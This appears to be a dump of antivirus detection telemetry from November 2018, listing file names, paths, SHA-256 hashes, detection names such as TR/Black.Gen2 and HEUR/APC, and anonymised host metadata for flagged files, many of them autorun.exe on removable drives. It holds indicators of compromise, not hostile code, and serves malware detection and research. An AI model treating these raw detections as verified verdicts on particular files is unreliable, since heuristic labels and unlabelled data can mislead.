  Row(detection=Row(filename='winzip20-lan.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-lan.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:43:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-184401-873ade8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a11d071\\AVSCAN-20181103-184328-80B5DDCF\\AVSCAN-20181103-184401-873ADE8A', filesize=1544000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:44:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200524-45ae04b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e58cd99\\AVSCAN-20181104-200102-24415FE5\\AVSCAN-20181104-200524-45AE04B9', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='35d42ca4d88fa10ec65c2c8f59a1cf1f5bbc207d386fec2bcb861269436c117f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:54:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='password_idm.exe', filepath='\\\\?\\C:\\ProgramData\\silent\\password_IDM.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='35db408b7e00c3a0201978750faafc034292a9caf7bcf9f12d0a5889f03e385c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-041411-1d87f001', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ea081ba\\AVSCAN-20181105-041341-19A8E908\\AVSCAN-20181105-041411-1D87F001', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Downloads\\msoxh\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-04T16:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='-elevate4820', country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=2199256, timestamp='2018-11-04T09:36:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3.zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1500248, timestamp='2018-11-04T20:12:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140032-1bbb87e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0be29e5\\AVSCAN-20181104-135959-177C3032\\AVSCAN-20181104-140032-1BBB87E3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162712-0a66fcb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a06e1a1c\\AVSCAN-20181104-162611-03054B3A\\AVSCAN-20181104-162712-0A66FCB8', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:27:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115313-3481e5ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12e64513\\AVSCAN-20181104-115258-3261BDDD\\AVSCAN-20181104-115313-3481E5EC', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140958-373076c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-140917-336FA3A2\\AVSCAN-20181104-140958-373076C9', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:32:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135223-d4f56872', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135141-D10A149A\\AVSCAN-20181104-135223-D4F56872', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103636-1f24b554', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4de55e\\AVSCAN-20181104-103619-1C8B9BB8\\AVSCAN-20181104-103636-1F24B554', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:15:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160244-ca33fd0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-160228-C8277B88\\AVSCAN-20181104-160244-CA33FD0F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151848-5f87b714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-151831-5DDC5EFB\\AVSCAN-20181104-151848-5F87B714', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164650-352798ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1cda043\\AVSCAN-20181104-164542-2B56EC8B\\AVSCAN-20181104-164650-352798ED', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T09:26:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T09:14:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152403-7eaa311f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-152342-7C973FFC\\AVSCAN-20181104-152403-7EAA311F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:24:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T09:26:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154306-2f40c00a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154249-2D01D064\\AVSCAN-20181104-154306-2F40C00A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:43:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115902-04cdedf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a982ce4\\AVSCAN-20181104-115844-01FF6954\\AVSCAN-20181104-115902-04CDEDF9', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172517-419546d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09c4c8d8\\AVSCAN-20181104-172353-3554EA83\\AVSCAN-20181104-172517-419546D6', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:25:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T14:23:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T16:39:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T09:43:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T14:15:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151508-c9fca103', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_477a6136\\AVSCAN-20181104-151436-C6565797\\AVSCAN-20181104-151508-C9FCA103', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:15:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145340-52b7b666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-145314-4F4C5781\\AVSCAN-20181104-145340-52B7B666', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:52:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103117-613a9656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_828d9b0e\\AVSCAN-20181104-103100-5E2828A4\\AVSCAN-20181104-103117-613A9656', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:28:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151413-4a0a26ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_465de9c8\\AVSCAN-20181104-151350-4688E5C1\\AVSCAN-20181104-151413-4A0A26EC', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104736-577c515f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104704-5390E50B\\AVSCAN-20181104-104736-577C515F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135607-e9d09c1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135523-E5B33332\\AVSCAN-20181104-135607-E9D09C1A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T12:59:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T14:14:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165142-5f9a64b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1cda043\\AVSCAN-20181104-165102-59D99D76\\AVSCAN-20181104-165142-5F9A64B0', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:51:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:25:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T15:44:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104700-532c9983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104630-4F83BD84\\AVSCAN-20181104-104700-532C9983', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145029-3935e5ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-144839-2A817995\\AVSCAN-20181104-145029-3935E5CA', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153019-a3c8a5a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-152957-A1964B86\\AVSCAN-20181104-153019-A3C8A5A7', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135531-e67677e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135442-E1F20C68\\AVSCAN-20181104-135531-E67677E2', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180017-494e6ab5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-175947-4561E314\\AVSCAN-20181104-180017-494E6AB5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104411-3e876b9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104340-3AC81E1B\\AVSCAN-20181104-104411-3E876B9F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:44:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152013-67e9bf65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-151954-6604AE06\\AVSCAN-20181104-152013-67E9BF65', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154417-388d18e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154400-3661B388\\AVSCAN-20181104-154417-388D18E3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102943-4fea8558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_828d9b0e\\AVSCAN-20181104-102926-4CA11A7B\\AVSCAN-20181104-102943-4FEA8558', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104216-ef182856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d977c98\\AVSCAN-20181104-104149-EB76981F\\AVSCAN-20181104-104216-EF182856', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:27:10Z'), dt=datetime.date(2018, 11, 4)),
